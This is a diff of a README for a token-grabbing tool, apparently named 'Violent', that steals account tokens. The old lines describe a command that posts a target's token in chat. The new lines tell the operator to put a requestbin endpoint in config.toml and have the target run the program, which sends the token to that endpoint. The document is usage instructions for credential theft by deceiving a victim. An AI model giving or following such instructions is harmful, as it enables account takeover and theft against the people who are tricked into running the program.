Acidic-x/Violent/README.md

 **How Do I Use This?**

-- Have your target enter their token in on the first line.
-- Have them run the code.

-**What Commands Are There?**

-- **send_token** - Sends Targets Token In Chat Ran In
+- Put your requestbin endpoint in the file "config.toml", and have your target run the program.
+    - DONT put "?token={}" in your endpoint.
+The program does it for you.